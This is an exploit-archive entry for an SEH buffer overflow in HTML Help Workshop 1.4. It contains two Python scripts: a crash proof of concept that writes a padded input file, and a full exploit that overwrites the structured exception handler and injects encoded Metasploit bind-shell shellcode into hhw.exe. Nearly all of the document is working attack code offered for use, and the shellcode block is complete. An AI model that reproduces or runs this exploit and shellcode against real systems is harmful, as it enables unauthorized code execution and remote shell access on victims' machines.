HTML Help Workshop 1.4 - (SEH) Buffer Overflow

2014-08-30T00:00:00
ID 1337DAY-ID-22563
Type zdt
Reporter Moroccan Kingdom
Modified 2014-08-30T00:00:00

Description

HTML Help Workshop version 1.4 SEH buffer overflow exploit.

                                        
                                            #----------------------------------------------------------------------------------------------------#
# Exploit Title: HTML Help Workshop - (SEH) Buffer Overflow                                          #
# Date: August 24 2014                                                                               #
# Exploit Author: Moroccan Kingdom (MKD)                                                             #
# Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx  #                                     #
# Version: 1.4                                                                                       #
# Tested on: Windows XP SP3/SP2 | Windows 7 64/32-bit  (eng)                                         #
#----------------------------------------------------------------------------------------------------#
 
import subprocess,time
import sys,os
 
if os.name == "nt" :
   subprocess.call('cls', shell=True)
   os.system("color c")
else :
   subprocess.call('clear', shell=True)
 
time.sleep(1)
 
print '''
///////////////////////////////////////////////////////////////////////////////
/                               M.O.R.O.C.C.A.N                               /
/                                K.I.N.G.D.O.M                                /
/                                    [MKD]                                    /
/ CONTACT US : facebook.com/moroccankingdom024 | twitter.com/moroccankingdom  /
/ To run this exploit Go to DOS and then go to the folder path program and    /
/ run this command : hc | exm : hcc.exe AAAABBBCCCSSS...           /
/////////////////////////////////////////////////////////////////////////////// '''
 
JNK = "A" * 284
NEH = "B" * 4                  
SEH = "C" * 4               
SHL = "S" * 400
 
POC = JNK + NEH + SEH + SHL
 
try :
   file = open("poc.txt", "w")
   file.write(POC)
   file.close()
   print "\n[*] file created successfully"
except:
   print "[#] error to create file"
  
close = raw_input("\n[!] press any button to close()")



------------------------------------------------------------------------

import subprocess
 
# Exploit Title: HTML Help Workshop 1.4 - Local Buffer Overflow Exploit (SEH)
# Date: 31/08/2014
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx
# Version: 1.4
# Tested on: Windows XP SP3 / Windows 7 Pro
 
junk = "A" * 832              # Junk bytes
nseh = "\xeb\x06\xff\xff"     # Overwrite next seh, with jump forward (over the next 6 bytes) instruction
seh  = "\xd0\x11\x30\x45"     # Overwrite seh with POP ECX,POP ESI,RETN from HHA.dll (Universal)
nops = "\x90" * 10            # Nops
 
#msfpayload windows/shell_bind_tcp EXITFUNC=seh R |
#msfencode -e x86/alpha_mixed -c 1 -b '\x00\x0a\x0d\xff'
shellcode = ("\x89\xe5\xd9\xc4\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x6b\x4c\x79\x78\x4f\x79\x65\x50\x57\x70"
"\x67\x70\x75\x30\x4c\x49\x58\x65\x30\x31\x69\x42\x30\x64"
"\x6c\x4b\x31\x42\x66\x50\x4e\x6b\x46\x32\x66\x6c\x6e\x6b"
"\x66\x32\x44\x54\x4c\x4b\x50\x72\x44\x68\x64\x4f\x68\x37"
"\x50\x4a\x65\x76\x65\x61\x4b\x4f\x46\x51\x4f\x30\x4e\x4c"
"\x55\x6c\x65\x31\x31\x6c\x36\x62\x44\x6c\x55\x70\x6b\x71"
"\x48\x4f\x44\x4d\x55\x51\x79\x57\x39\x72\x68\x70\x33\x62"
"\x66\x37\x6e\x6b\x42\x72\x36\x70\x6e\x6b\x42\x62\x45\x6c"
"\x56\x61\x68\x50\x6c\x4b\x61\x50\x61\x68\x6c\x45\x4f\x30"
"\x31\x64\x72\x6a\x75\x51\x78\x50\x42\x70\x6e\x6b\x30\x48"
"\x42\x38\x4e\x6b\x73\x68\x61\x30\x76\x61\x6e\x33\x69\x73"
"\x47\x4c\x72\x69\x6e\x6b\x77\x44\x4c\x4b\x65\x51\x79\x46"
"\x34\x71\x79\x6f\x50\x31\x4f\x30\x6c\x6c\x7a\x61\x38\x4f"
"\x54\x4d\x57\x71\x68\x47\x77\x48\x79\x70\x54\x35\x7a\x54"
"\x67\x73\x61\x6d\x79\x68\x65\x6b\x61\x6d\x36\x44\x61\x65"
"\x78\x62\x36\x38\x6e\x6b\x42\x78\x64\x64\x53\x31\x49\x43"
"\x63\x56\x4e\x6b\x66\x6c\x52\x6b\x4c\x4b\x53\x68\x35\x4c"
"\x55\x51\x59\x43\x6c\x4b\x43\x34\x6c\x4b\x57\x71\x38\x50"
"\x4c\x49\x72\x64\x77\x54\x51\x34\x53\x6b\x53\x6b\x50\x61"
"\x63\x69\x32\x7a\x42\x71\x59\x6f\x6b\x50\x36\x38\x71\x4f"
"\x71\x4a\x4e\x6b\x75\x42\x48\x6b\x4e\x66\x51\x4d\x43\x58"
"\x56\x53\x56\x52\x55\x50\x75\x50\x43\x58\x52\x57\x73\x43"
"\x45\x62\x61\x4f\x31\x44\x31\x78\x62\x6c\x43\x47\x66\x46"
"\x34\x47\x49\x6f\x5a\x75\x6c\x78\x6a\x30\x46\x61\x37\x70"
"\x63\x30\x34\x69\x4f\x34\x51\x44\x62\x70\x63\x58\x67\x59"
"\x4d\x50\x52\x4b\x43\x30\x39\x6f\x68\x55\x36\x30\x56\x30"
"\x46\x30\x66\x30\x73\x70\x72\x70\x71\x50\x52\x70\x70\x68"
"\x78\x6a\x44\x4f\x49\x4f\x4d\x30\x49\x6f\x49\x45\x6c\x49"
"\x79\x57\x66\x51\x39\x4b\x51\x43\x70\x68\x76\x62\x47\x70"
"\x66\x71\x33\x6c\x6d\x59\x79\x76\x43\x5a\x72\x30\x66\x36"
"\x36\x37\x52\x48\x69\x52\x4b\x6b\x65\x67\x72\x47\x59\x6f"
"\x69\x45\x76\x33\x31\x47\x62\x48\x6d\x67\x39\x79\x45\x68"
"\x79\x6f\x39\x6f\x4a\x75\x32\x73\x42\x73\x30\x57\x73\x58"
"\x44\x34\x4a\x4c\x55\x6b\x68\x61\x39\x6f\x69\x45\x70\x57"
"\x6b\x39\x4a\x67\x32\x48\x63\x45\x50\x6e\x62\x6d\x65\x31"
"\x39\x6f\x6e\x35\x73\x58\x72\x43\x42\x4d\x30\x64\x43\x30"
"\x6e\x69\x5a\x43\x56\x37\x73\x67\x43\x67\x66\x51\x7a\x56"
"\x33\x5a\x52\x32\x71\x49\x33\x66\x48\x62\x4b\x4d\x73\x56"
"\x59\x57\x72\x64\x66\x44\x47\x4c\x66\x61\x57\x71\x4e\x6d"
"\x67\x34\x31\x34\x46\x70\x79\x56\x75\x50\x57\x34\x70\x54"
"\x62\x70\x36\x36\x32\x76\x42\x76\x57\x36\x76\x36\x42\x6e"
"\x63\x66\x33\x66\x73\x63\x30\x56\x32\x48\x50\x79\x78\x4c"
"\x37\x4f\x4f\x76\x39\x6f\x4e\x35\x6c\x49\x79\x70\x50\x4e"
"\x52\x76\x61\x56\x39\x6f\x50\x30\x61\x78\x36\x68\x6d\x57"
"\x67\x6d\x53\x50\x79\x6f\x38\x55\x6d\x6b\x4b\x4e\x66\x6e"
"\x45\x62\x79\x7a\x33\x58\x59\x36\x4e\x75\x4f\x4d\x4d\x4d"
"\x39\x6f\x59\x45\x55\x6c\x56\x66\x33\x4c\x66\x6a\x6f\x70"
"\x79\x6b\x39\x70\x71\x65\x54\x45\x6d\x6b\x53\x77\x37\x63"
"\x73\x42\x42\x4f\x73\x5a\x77\x70\x70\x53\x79\x6f\x49\x45"
"\x41\x41")
 
exploit = junk + nseh + seh + nops + shellcode
subprocess.call(['C:\\Program Files\\HTML Help Workshop\\hhw.exe ',exploit])
 
# EOF

#  0day.today [2018-04-11]  #